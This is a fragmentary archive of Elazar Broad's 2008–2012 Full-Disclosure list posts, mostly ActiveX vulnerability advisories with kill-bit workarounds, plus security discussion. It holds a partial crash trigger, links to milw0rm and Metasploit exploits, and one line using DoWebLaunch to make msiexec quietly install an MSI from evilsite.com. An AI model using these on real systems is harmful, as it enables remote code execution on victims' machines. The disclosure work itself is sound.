My .0002
elazar
On Thursday, June 21, 2012 at 3:26 PM, Thor (Hammer of God)
wrote:
>
>I completely agree with Gage. The way I see it, security through
>obscurity is perfectly valid as long as the control remains
>obscured. I think the "anyone can just scan your ports"
Ferenc,
I got one as well a few weeks ago. I suspect you are correct in your
assumption.
elazar
On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs wrote:
>
>Hi,
>
>Anybody else got this message? I think they are "spamming" the
>subscribers/regular
2012 07:58:09 +0100
(BST)
At least configure your SPF record policy to hard fail, and consider Domain
Keys and/or DMARC.
elazar
On Tuesday, April 17, 2012 at 10:40 AM, a...@infosecinstitute.com wrote:
Guys,
this is a fake release, someone spoofed my email and sent this out
as a joke to mock
"Sounds like this industry could benefit from these kids even more
since they are driving home the points you all are supposed to be
warning them about."
That's because these kids don't have mouths to feed and a paycheck to
worry about. Ethics and ethos are all very nice when you have
r security
posture is moot" make for an easy target. I still like the fact
that real-time drone video can be viewed using SkyGrabber, don't
most local LEO use the same technology(albeit on a smaller scale)?
I'm sure many criminals and organized crime can afford a DVB-S
card...
My
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
http://www.eff.org/issues/printers
On Tue, 12 Jul 2011 16:48:45 -0400 Jason Ellison
wrote:
>list,
>
> Sometime ago I remember reading an article on printers being
>used to
>gain intelligence in an embassy or government agency. The
>printer
>had a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Most people charge for that, the least Juan could do is give you a
*free* "license" for his scamware(we know you want it ;) ).
Ah, the state of so-called "security" these days...it's
sad.
elazar
On Wed, 22 Jun 2011 2
>On Mon, Feb 21, 2011 at 9:10 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> (never start a sentence with)And just to be the grammar douche,
>> that should be:
>>
>>
>> With the latTer as the majority o
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
(never start a sentence with)And just to be the grammar douche,
that should be:
With the latTer as the majority of course.
elazar
On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
wrote:
>I agree, you should move your business to IRC. T
k(i.e IPSEC etc.), would you
still do it?
my .02
elazar
On Sun, 06 Feb 2011 09:47:39 -0500 phocean <0...@phocean.net> wrote:
>Hi all,
>
>I would like to get some feedback about the vswitches and how to
>deal
>with physical network separation.
>I have an idea about this but I w
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Just lightly scratching the surface, KeyScrambler.sys is signed by
GlobalSign, strings reveals nothing interesting other than OpenSSL
0.9.8a is used.
elazar
On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault
wrote:
>Call me paranoid, but that s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
It is definitely possible(http://www.cultofmac.com/android-app-sends-personal-data-to-china/52929),
there have been several well-known local root exploits
(i.e. http://c-skills.blogspot.com/2010/08/please-hold-line.html) for the Android
system, though
trying to clean (hint..hint blended threats).
Backup your stuff, dban the drive(zeros, 1 pass) and rebuild the
box.
elazar
On Tue, 23 Nov 2010 09:26:49 -0500 "Mikhail A. Utin"
wrote:
>As we see, our list has a few (luckily just a few) unprofessional
>people thinking of themsel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
+1 for Vipre, it's cheap(about $10 or less per seat, per year),
generally resource conscious and pretty granular centralized policy
management and last but not least, its detection and fp to fn ratio
is pretty solid. Aside from a recent issues with its
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Can't you? The world is full of unpatched systems. You can even find
systems where patches are not installed because it is running a
piece of
mission critical software and they would lose support if they
installed
any patches (I am not making this up)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ed or nano? :)
On Thu, 29 Jul 2010 20:47:19 -0400 valdis.kletni...@vt.edu wrote:
>On Thu, 29 Jul 2010 17:18:28 PDT, Zach C said:
>> So if Drupal and WordPress, etc. are so terrible, what would you
>all recommend?
>
>vi or emacs. Take your pick, I'm no
code.
Fix
-
SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.
Credit
-
Elazar Broad
/index.html.
elazar
On Tue, 25 May 2010 16:08:45 -0400 valdis.kletni...@vt.edu wrote:
>On Wed, 26 May 2010 01:25:25 +0545, Bipin Gautam said:
>
>Rest of article actually looks good at first glance, but this
>jumped out at me:
>
>> > -Software disk Wiping:
>> > W
without the client seeing
that too?
elazar
On Thu, 06 May 2010 13:46:08 -0400 T Biehn wrote:
>A proxy or 'web-service firewall' prior to the 'protected' web
>service is
>the correct answer.
>
>Obfuscating the client code be it JavaScript, Interpreted (Java,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Unless you wrap your service methods with some form of an
authentication, your web services are just as public as any other
"world" accessible part of your site. Are the pages calling these
services behind any sort of authentication?
On Thu, 06 May 20
**
>"It is as useless to argue with those who have
>renounced the use of reason as to administer
>medication to the dead." Thomas Jefferson
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.gro
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Works fine for me...
On Sun, 06 Sep 2009 14:23:37 -0400 David Alanis
wrote:
>Good Day,
>
>Anyone happen to know what is going on with www.modsecurity.org or
>
>www.breach.com?
>
>Cheers,
>David
>
>-
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
http://www.sandboxie.com/
On Fri, 04 Sep 2009 14:05:24 -0400 RandallM
wrote:
>how come we just can't sandbox the browser in away from the
>system.
>its the users that just get gmail and click links, watch youtube
>vids
>and check FaceBook and Mypace
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Like them or not, M$ has done quite a bit with its SDL[1], and
though quite late in the game, the memory protection mechanisms in
Vista and Windows 7. As far as anti-virus software goes, it's
mostly useless[2][there was a recent article on signature l
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 28 Aug 2009 16:34:27 -0400 Paul Schmehl
wrote:
>--On Friday, August 28, 2009 13:40:28 -0500 Rohit Patnaik
>
>wrote:
>
>>
>> To be fair, Linux has come a very long way in that regard. I
>purchased
>> an Asus Eee 900 with Linux preinstalled, a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 28 Aug 2009 17:20:09 -0400 Peter Besenbruch
wrote:
>> > The OS on my machines will not allow a person to run an
>administrative
>> > desktop. It enforces the separation between the administrator
>and a
>> > normal user by requiring the creat
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
There's a few on Milw0rm(2,3,4 I believe)...
On Thu, 30 Jul 2009 00:59:34 -0400 NAHieu wrote:
>this is hilarious!
>
>i am wondering where to get other issues, i.e zf01 --> zf04?
>
>thanks,
>H
>
>On Wed, Jul 29, 2009 at 8:32 AM, Headenson
>John wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I've seen enough RAID controllers take a crap all over all the
disks far too many times in my career.
http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/
Sound familiar?
On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.ed
rded your issue in our
tracking database and will determine its priority if/when we
determine new investment is required for this technology.
Thank You – Autodesk"
Timeline:
06/17/2008 - Vendor notified
03/31/2009 - Vendor final response
04/02/2009 - this advisory
Credit:
Elazar Broad
-
>'breaking and entering' into their mind?
>
>-Travis
>
>On Fri, Mar 13, 2009 at 4:53 PM, Elazar Broad
> wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> I am inclined to agree, except that you still have issues with
>the
>>
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I am inclined to agree, except that you still have issues with the
electronic equivalent of breaking and entering. Case in point,
there is a good chance you would be arrested and prosecuted if you
opened the door to another person's dwelling which did n
waste of time.
Workaround:
As previously stated, the web server is not enabled by default.
If you do need to use it, use a firewall or OS port filtering
capabilities to restrict access.
Elazar
has been notified.
Workaround:
Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html
Elazar
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
...stealthy infection is trickier.
but not impossible, check out Symantec/F-Secure joint analysis of
mebroot:
https://forums.symantec.com/t5/blogs/blogprintpage/blog-id/malicious_code/article-id/244;jsessionid=A4811540934368155A4B0BEE4D0B0615.
Now
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
"You know how the current amateur botnet offerings are basing
domain lists off the current time to allow the 'good guys' to
prepare?"
Shhh, you're gonna wake the " writes all the
malware" theorists...
On Thu, 19 Feb 2009 23:13:38 -0500 T Biehn wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I maintain that by not educating our users we are failing in that
goal.
With many it is in one ear, out the other, unless you are allowed
to use a clue bat...
On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox
wrote:
>2009/2/6 Yudi Rosen :
>
>> But J
increase slightly over the life of the mouse
in order to solve the blind shock and click problem...
elazar
On Fri, 06 Feb 2009 05:57:03 -0500 Yudi Rosen
wrote:
>But Joe the Plumber doesn't want to have to click on endless
>'confirm'
>dialogs every time he tries to use the com
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
And you can probably find a majority of those 72 listed here
http://www.nsopw.gov...
On Fri, 23 Jan 2009 10:24:12 -0500 Miller Grey
wrote:
>...hehe...
>
>On Mon, Jan 12, 2009 at 7:50 PM, wrote:
>
>> On Mon, 12 Jan 2009 09:41:19 PST, Rants nRaves s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
is more cost effective
should have been is *it
On Wed, 31 Dec 2008 12:57:52 -0500 Elazar Broad
wrote:
>That's true, keeping up with security is not cheap nor easy.
>Tradeoffs are tradeoffs, the question is, when it comes
c 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>> And they should have listened then, it was only a matter of time
>> before someone fleshed out a practical attack, and that time is
>> now. Then again, I am sure there some
lowing up on internet carders and shutting them down.
>>
>> On Tue, Dec 30, 2008 at 5:03 PM, Elazar Broad
> wrote:
>> > -BEGIN PGP SIGNED MESSAGE-
>> > Hash: SHA1
>> >
>> > SSL/PKI is only as strong as the weakest CA...
>> >
>&
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I am waiting for RapidSSL's reaction, then again, $12 certs, you
get what you pay for...
On Tue, 30 Dec 2008 14:02:11 -0500 James Matthews
wrote:
>This is going to be fun for all e-commerce sites etc
>
>On Tue, Dec 30, 2008 at 7
Years!
elazar
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
April Fools isn't for another 4 months...
On Mon, 22 Dec 2008 17:53:29 -0500 n3td3v
wrote:
>Real researchers who should be taken seriously aren't taken
>seriously anymore.
>
>I'm leaving full-disclosure because of the abuse.
>
>It's just turned into
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Barracuda opened this up to the public back in September, see
http://www.barracudacentral.org/rbl. I have been using it for about
2 months or so, it seems to be pretty effective. Is anyone else out
there using it? What do you think?
elazar
.
>
>You should revisit this opinion after you're out of school and in
>the
>workforce for 5 years. :)
>
>On Tue, Dec 9, 2008 at 1:53 PM, Luke Scharf <[EMAIL PROTECTED]>
>wrote:
>
>> Elazar Broad wrote:
>> > Neither, because ultimately no one care
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Financial IT has much competence, the problem is the red tape and
politics that many face when trying to get the job done, but then
again, you have that everywhere, I am just venting/lamenting over
it...
On Wed, 10 Dec 2008 12:23:38 -0500 Luke Scharf <[EMAIL PROTECTED]>
wrote:
>Elazar Broad wrote:
>> Neither, because ultimately no one cares, and that is why the
>> financial industry foots the 60 billion identity theft bill. My
>> rant was a little bit of wishful thinking and a shred of belief
>in
>>
[EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 13:26:15 EST, Elazar Broad said:
>> I never said we need to do something, passive awareness *can* go
>a
>> long way...
>
>Right. The danger is that you want to give the people a *reason*
>to
>care.
>
>"If you'
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I never said we need to do something, passive awareness *can* go a
long way...
On Tue, 09 Dec 2008 13:12:25 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 12:20:36 EST, Elazar Broad said:
>> Changing the public opinion and mindset m
Following a major cyber-attack, he told legislators,
>electricity,
>banking, and communications could all go dead, leaving Americans
>scrounging
>for food, water, gasoline—even hunks of firewood traded on the
>black market.
>
>
>On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad <[EMAI
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Brilliant use of deflection, keep it up, you might end up as some
loser serial rapist on Law and Order, oh wait, they want actors,
not the real thing...
On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Dec 9, 2008 at 3:08
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
They ain't called beltway bandits for nothing...
On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
<[EMAIL PROTECTED]> wrote:
>Ivan, all,
>
>Hold the phone...$5k-$7k to fix an infected device!? Really?
>HOLY
>CRAP... either that's a c
r system
has turned into a complete and utter joke(for the most part), so my
friend, you see, this is a complete exercise in futility(besides the
fact that every friggin AV/IDS/Security/SIM company out there has
red, yellow and green as their corporate "flag", if you are just
joining the party, th
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I stopped using SonicWall when I learned I had to purchase a whole
new device for a customer that just wanted to add a few more
machines to their network, instead of bumping the license like most
"normal" vendors.
On Tue, 02 Dec 2008 14:14:43 -0500 IT
>--On November 26, 2008 1:59:27 AM -0600 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Um, NTLM isn't the only 20 or so year old protocol to take the
>rap
>> recently, I can thin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Um, NTLM isn't the only 20 or so year old protocol to take the rap
recently, I can think of a low numbered rfc, let's say 1034 and
1035. Hindsight is 20/20, and 20 years ago, who would have thought
that a 16 bit number was way too small for DNS transact
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Symantec's Endpoint Protection has a device control feature which
basically functions as you have stated. I haven't really played
around with it much, however, it can block devices based on device
id...
elazar
On Mon, 24 Nov 2008 00:1
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
A quick test of OWA 2007 shows that it is not vulnerable...
On Sat, 15 Nov 2008 11:36:26 -0500 Micheal Cottingham
<[EMAIL PROTECTED]> wrote:
>I found and reported this back in 2005/2006. Microsoft told me
>that it
>had been reported previously and tha
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
What scene...
On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no
>experience? i make that about 10 years experience if my math is
>correct.
>
>On Fri, Nov 7, 2008 at 1
ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <[EMAIL PROTECTED]>
>wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> What's your poison of choice?
>>
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
What's your poison of choice?
On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>I already have a drinking game going, awarding myself a drink for
>every time n3td3v says something stupid, and every time I play it
>I
>run out
So take it up with him like a man and not on our inboxes...
On Tue, 14 Oct 2008 08:51:33 -0400 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Oct 14, 2008 at 1:28 PM, M. B. Jr.
><[EMAIL PROTECTED]> wrote:
>> And by the way, why insistently and specifically targeting
>Metasploit?
>
>i don't like hd
etty high. You can't forget the
"somewhat" obvious as well, if you found it, someone else can find
it too. As far as the vendor is concerned, well, we all know what
happened to a certain electronic voting machine vendor...Look, I'm
not an expert, this is just my .02...
elazar
On Sun
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I would opt for #1, additionally, contacting CERT and other quasi-
government security organizations would be a plus, they might have
better luck lighting a fire under the theoretical vendor's ass...
elazar
On Sat, 27 Sep 2008 03:39:34 + Simon
PoC
06/25/2008 <- Vendor responds stating that they are aware of this
issue
08/06/2008 - Disclosure
Elazar
On Mon, 28 Jul 2008 13:14:37 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Trend Micro
>http://www.trendmicro.com
>
>What:
>OfficeScan 7.3 build 1343(Patch 4) and older
>http://www.trendmicro.com/download/product.asp?productid=5
>
>How:
>OfficeScan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Trend Micro
http://www.trendmicro.com
What:
OfficeScan 7.3 build 1343(Patch 4) and older
http://www.trendmicro.com/download/product.asp?productid=5
How:
OfficeScan's Web Console utilizes several ActiveX controls when
deploying the product throug
these were not).
Fix:
Real Networks has released fixes for this issue, please see
http://service.real.com/realplayer/security/07252008_player/en/
Elazar
Or this http://www.emergingthreats.net/content/view/87/1/
On Fri, 25 Jul 2008 14:22:22 -0400 "Albert R. Campa"
<[EMAIL PROTECTED]> wrote:
>check this out
>http://securabit.com/2008/07/24/latest-snort-signature-to-detect-dns-vulnerability/
>
>
>On Fri, Jul 25, 2008 at 12:59 PM, crazy frog crazy
Sorry if I was not clear enough, I meant in the commit comments. I
agree, you need about a brain and a half to spot kernel bugs in the
code itself...
On Thu, 17 Jul 2008 10:58:03 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Thursday, July 17, 2008 10:35:21 -0400 Elazar Broad
along with
the general public don't have to rely on "HIGHLY SUGGESTED THAT YOU
UPGRADE" announcements from the kernel maintainers without knowing
why.
Elazar
On Thu, 17 Jul 2008 06:57:57 -0400 Dave Aitel
<[EMAIL PROTECTED]> wrote:
>I think what Brad and the Pax Team are say
[EMAIL PROTECTED]
http://osvdb.org/vendor/1/Oracle%20Corporation
On Wed, 16 Jul 2008 19:22:01 -0400 Kristian Erik Hermansen
<[EMAIL PROTECTED]> wrote:
>Anyone have it?
>
I can confirm the same behavior on a Cisco PIX 501 running 6.3(5).
Port numbers are incremented sequentially by one...
On Fri, 11 Jul 2008 11:01:33 -0400 Thomas Cross <[EMAIL PROTECTED]>
wrote:
>Riad,
>
>Thanks for testing this. A number of other readers wrote me
>privately
>confirming your
Probably, I completely missed that, and they do seem to be the
defaults. I'll test it out tomorrow. Thanks Paul!
On Thu, 10 Jul 2008 22:31:56 -0400 Paul Szabo
<[EMAIL PROTECTED]> wrote:
>Elazar,
>
>> ... Internet Explorer [with] proxy auto-configuration ...
>> Th
Explorer can properly
differentiate what is on the local network or not. I guess if it
can't then this whole issue is moot.
Elazar
"We are an impatient lot in this community." - well said...
On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux"
<[EMAIL PROTECTED]> wrote:
>On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
>> Please allow at least one week for us to respond before public
>> disclosure. We only recei
Does anyone have a security contact for Autodesk?
elazar
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Yup, CCEs and default configurations/passwords are definitely quite
common. The folks over at gnucitizen have been hitting on this for
some time with their work on the bt home hub...
Elazar
On Fri, 23 May 2008 12:16:45 -0400 Paul Schmehl
<[EM
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The out of the box ruleset for SmartDefense on the FW1 does some
basic string checking on web traffic(i.e. checking get and post
variables for sql injection and xss etc.) along with some strict
RFC checks, I don't know to what extent though...
E
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
It's not even funny how often this happens. I have a friend who does
some consulting work for small businesses, and the amount of times
that he has come across medical practices that run their billing
and record keeping software on the same "fully-loade
Yea, and there are plenty that can't even set up their own home
network...
On Mon, 19 May 2008 15:34:41 -0400 Soldi <[EMAIL PROTECTED]>
wrote:
>> CISSP's cant hack
>
>Huh?
>
>There are plenty of CISSPs you wouldn't want on your bad side.
>They just decided to grow up and make a legitimate livi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Keep in mind that rootkit functionality itself isn't all bad, take
anti-virus software for example. It's like a shark trawling the
bottom of the sea floor, looking up at its next meal on high; how
deeply can you hook the OS core...
Elazar
On Su
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Now that this is patched...
http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/realplayer_console.rb
Elazar
On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Let the foolz begin :) Happy April 1st!
On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<[EMAIL PROTECTED]> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WIT
sole;
obj.Console = buf;
obj.Console = m
//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
- -
Workaround:
Set the killbit for this control. See
http://support.microsoft.com/kb/240797
Fix:
No official fix known
Exploit:
Working on it
Elazar
known
Exploit:
Will be posted on milw0rm.com
Elazar
http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
fix known
Workaround:
Set the killbit for this control, see
http://support.microsoft.com/kb/240797
Exploit:
http://milw0rm.com/exploits/5052
Elazar
these controls, see
http://support.microsoft.com/kb/240797
Exploit:
Code should be posted on milw0rm shortly
Elazar
uffer overflow in the Action
property.
I believe FaceBook also uses/repackages the Aurigma control, I
don't know which version though.
Fix:
No official fix known
Vendor notified
Workaround:
Set the KillBit for this control, see
http://support.microsoft.com/kb/240797
Elazar
better yet, remove it altogether.
Fix:
No official fix known
P.S. To SF and others, e.b. is my initials :)
Elazar
://support.microsoft.com/kb/240797.
Fix:
None
Elazar
Cryptsetup with LUKS is an option, you could build a custom kernel
and initrd and put it on a UFD...
Elazar
On Wed, 16 Jan 2008 10:38:37 -0500 coderman <[EMAIL PROTECTED]>
wrote:
>On Jan 16, 2008 4:53 AM, Frank Sanders <[EMAIL PROTECTED]>
>wrote:
>> Can any o
e) on Milw0rm, exploiting this is pretty self
explanatory though...
Elazar
On Mon, 14 Jan 2008 19:51:22 + Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Macrovision
>
>What:
>Macrovision FlexNext Connect is a software package that allows
>ISV's to update their software
system.
On Mon, 14 Jan 2008 14:51:22 -0500 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Macrovision
>
>What:
>Macrovision FlexNext Connect is a software package that allows
>ISV's to update their software products. It is generally used in
>conjunction with the I
Who:
Macrovision
What:
Macrovision FlexNext Connect is a software package that allows
ISV's to update their software products. It is generally used in
conjunction with the InstallShield software deployment framework.
FlexNet uses a number of ActiveX controls, some of which are marked
safe for
the killbit for this control, see
http://support.microsoft.com/kb/240797
Elazar
I was playing with this a bit more. Everybody has the Windows
Installer installed, right? How about this:
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe",
"","/i http://www.evilsite.com/evilapp.msi /quiet");
Elazar
On Tue, 08 Jan 200
files, weblaunch.ocx is vulnerable to
the above mentioned buffer overflow, I have not checked
weblaunch2.ocx. Exploit: http://www.milw0rm.com/exploits/4869
Elazar